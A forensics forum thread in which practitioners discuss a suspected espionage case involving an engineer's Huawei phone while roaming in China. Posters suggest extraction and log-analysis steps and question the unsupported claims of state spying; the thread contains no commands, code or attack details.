On a smartphone, are there equivalents of computer Ports?
On smartphones are there the equivalents of Windows processes?
I saw one SANS video wherein the malware used a basic Windows process to send data to a specific IP address. The malware code was obscured by multiple layers of text encoding, but a well crafted PERL script was able to turn the malware to plain text thus unmasking the Windows Powershell conmand and remote unfriendly IP server address.
Question could one use a Harris Corporation Stingray device to trick your Huawei phone and SIM card into thinking the phone was pinging a Chinese cell tower.
I have never personally done it before but I bet I could dissect a Cellebrite extraction of your Huawei phone and compare a timeline of phone activity to data being captured by the Stingray to match specific transmissions to specific time points to specific file activity on the phone. Perhaps a chip off extraction performed as well to see if there are any embedded systems on a chip located on the phone’s motherboard that might bypass Android or iOS.
Good questions, really. I am just cryptographer.
Its a plain sight problem and the risk of searching too far away the biggest problem.
For good reasons an engineer travelled to P.R.C. to join a conference. Mysteriously as she was in P.R.C. during night times her device did not charge properly. So long so good she thought about a broken charger, but was not broken. This woman is blessed by sleeping well but the third night she woke unexpected at 0200h local time and recognised that her device was very hot. She had a T-Mobile SIM card in roaming state with unlimited data plan. In P.R.C she was connected to China Mobile in roaming state.
An this SIM is in our lab.
I know us techies have a tendency to exclusively assess matters from our technical fields of expertise and solve our puzzels like that. We need to however take into consideration that technology was and still is, just a supportive matter when it comes to spying on an emphatically targeted single person.
There are many non technical factors in this specific scenario that we should take into consideration as well.
From the defensive perspective, the primary question here could be, how plausible is it to specifically target this particular person for espionage purposes. The next question would be does the country she is traveling to, have both the capabilities and intentions to acquire the data we are trying to protect. There is a big difference between targeting 1 specific person and acquiring general phone usage related data for big data analysis by retail organizations following their customers based on phone usage.
On the offensive side, the alleged agressor(s) will have asked themselves the same question. Will it pay off to specifically target this person. You can have all the technology and data acquistion means in the world, spy on everything and everyone, however the big dilemma is, you need to process and analyse all that acquired data. When it comes to targetting a specific person, determining the intrinsic value of what you actually acquired is still a manual process.
What I am trying to say here is that in the event the agressors have determined your engineer is worth it to be spied upon, there are most likely more efforts pending or already executed to "bring her home" then just trying to get into her phone. The phone issue is just 1 of probably multiple efforts / actions to acquire the confidential data she has under her control.
From the technical perspective, were you able to determine if the charging related malfunctioning and heat issues could be related to anything else then an offensive attempt to acquire data from and / or access to, the device in question? This could in essence be nothing more then an ordinary battery malfunction issue.
On a more general note, if your customer, by the nature of their business, could be the target of nation state initiated economic espionage, my advise would be to contact the responsible intelligence or security service. For your country that would probably be the FIS.
Saludos,
Lex
A better question perhaps is why your client did not travel to PRC with burner phones and computers?
I have been told to assume one's electronic devices will be compromised and copied upon entry to the PRC in an automated fashion.
A very capable Android smartphone and laptop computer can both be purchased for a total of US$300.00 (banggood dot com or gearbest dot com).
What if your client's Huawei phone has a chip built in, that once connected to the PRC domestic Internet, generates a mobile backup automatically?
To assume your client was singled out by the PRC, without any supporting evidence, is a bit weak, in my opinion.
An even better question would be what specific Intellectual Property (IP) your client took to the PRC on their laptop and Huawei phone?
IP can be defined as something which the IP owner takes reasonable steps to protect such as future prototype CAD drawing files.
"Not-IP" can be defined as the company's founder's mother's chocolate chip recipe that the company gives out for free to customers.
Personally, I would be much more concerned to find out my company's future business prototype was exfiltrated.
If you use Oxygen/Cellebrite/XRY/BlackLight to collect your client's Huawei phone, you should look at both human generated and system generated file system activities, logs, SQLite database files, data transmission logs UP 3.5 kb / DOWN 4.5 kb for the night your client was in her hotel room in the PRC.
If your client's phone held a 500mb AutoCad .DWG file of the company's future product, then examine that file and any interaction which may have taken place with that file on the phone the nights in the PRC hotel.
** I know next to nothing about Cryptography - what should members here at Forensicfocus.com know about Cryptography forensics?
Lex, Larry good points and worth considering aspects.
You may see my initial post and think a long time about it. For some reasons I cannot reveal more details about the engineer and instituion she works for. As its an ongoing investigation it came out, that at the hot-device-night a large data amount - consisting of research enrichted science was downloaded from the home datacenter to the Huawei mobile.
The engineer did not initiate this large data download over roaming. But she was definitively out of her team the most legitmate looking person to request the data. For me it looks like this was professional spying in the shadow of a person, no one would detect it as espionage. It hat to look that she needed that data for the conference - but was not the case.
The mobile was just the bridge, it was not about data ON the mobile.
And there we got involved. Employess are free by BYOD and running OWA for UCC. The device in question was a Huawei P20 Pro.
TinyBrain some observations, but not criticism. If you use acronyms best you state what you say the acronym means.
And there we got involved. Employess are free by BYOD and running OWA for UCC. The device in question was a Huawei P20 Pro.
OK, leaving aside the keys with the IT guys. Do you have this phone and/or what examination and analysis has been undertaken? Has the examiner applied any of the suggestion raised by UnallocatedClusters?
Mysteriously as she was in P.R.C. during night times her device did not charge properly. So long so good she thought about a broken charger, but was not broken.
How did she know it was broken? Did she buy a new charger? Test the charger on another identical Huawei P20 Pro? Why did this woman not buy a new battery and swap out with the one over-heating?
This woman is blessed by sleeping well but the third night she woke unexpected at 0200h local time and recognised that her device was very hot.
This sounds like those that fed this part of the story to you TinyBrain have used artistic licence. They may as well have started the story with "It was a dark night. An owl's hoot was heard coming from the direction of the cops. …."
What is the significance of the time this woman awoke?
What woke her up - Burning smell, crackling noise coming from phone, what???
and recognised that her device was very hot. She had a T-Mobile SIM card in roaming state with unlimited data plan. In P.R.C she was connected to China Mobile in roaming state. An this SIM is in our lab.
Again, the battery? the charger?
Did anyone test for spyware app (put there by IT guys) on the BYOD device? Spyware is known to cause battery temperature to rise.
Where is the evidence of the T-Mobile data plan traffic usage?
What did the phone's internal data usage reveal?
Still don't see the need for Huawei if, and only if, they were spying to reveal their hand with such a stupid approach. After all TinyBrain you did mention in your earlier post
As in the past chip-based backdoors were on vogue but no more. The new kid in town's name is Software-Definded Networking e.g. SD-WAN and NFV.
So why would the battery or the charger circuitry be overheating when 'comms' can be (hidden) monitored in the network away from exposure?
TinyBrain, good buddy, sorry if I have got this wrong and I understand this is not your fault for the story you have been fed but can we have the forensic aspects of this case and not the speculation. You have identified NO evidence that Huawei has done anything in spying terms other than their make/model of phone 'might' have had a dodgy battery.
They may as well have started the story with "It was a dark night. An owl's hoot was heard coming from the direction of the cops. …."
Damn.
I was thinking more like "Suddenly she woke up. Clad in her flimsy nightgown, her tall slender figure silhouetted against the moonlight entering from the curtainless window, she felt a cold shiver running down her spine. Something was not right, she felt observed, … " wink
jaclaz
If done well, "calling home" should be done at hardware level, without any trails or logs. If you ask me, I would build this as part of the CPU or the chipset - or both )
Did anybody dissect any Kirin CPU or Hisilicon chip and check if there isn't any built-in backdoor shipped with them ?!
I'd start looking for any kind of Reserved ranges of the Hisilicon chip.
They may as well have started the story with "It was a dark night. An owl's hoot was heard coming from the direction of the cops. …."
Damn.
I was thinking more like "Suddenly she woke up. Clad in her flimsy nightgown, her tall slender figure silhouetted against the moonlight entering from the curtainless window, she felt a cold shiver running down her spine. Something was not right, she felt observed, … " winkjaclaz
lol
To assume your client was singled out by the PRC, without any supporting evidence, is a bit weak, in my opinion.
That, I think is Tinybain's challenge and why he is posting here.
Rg,
Lex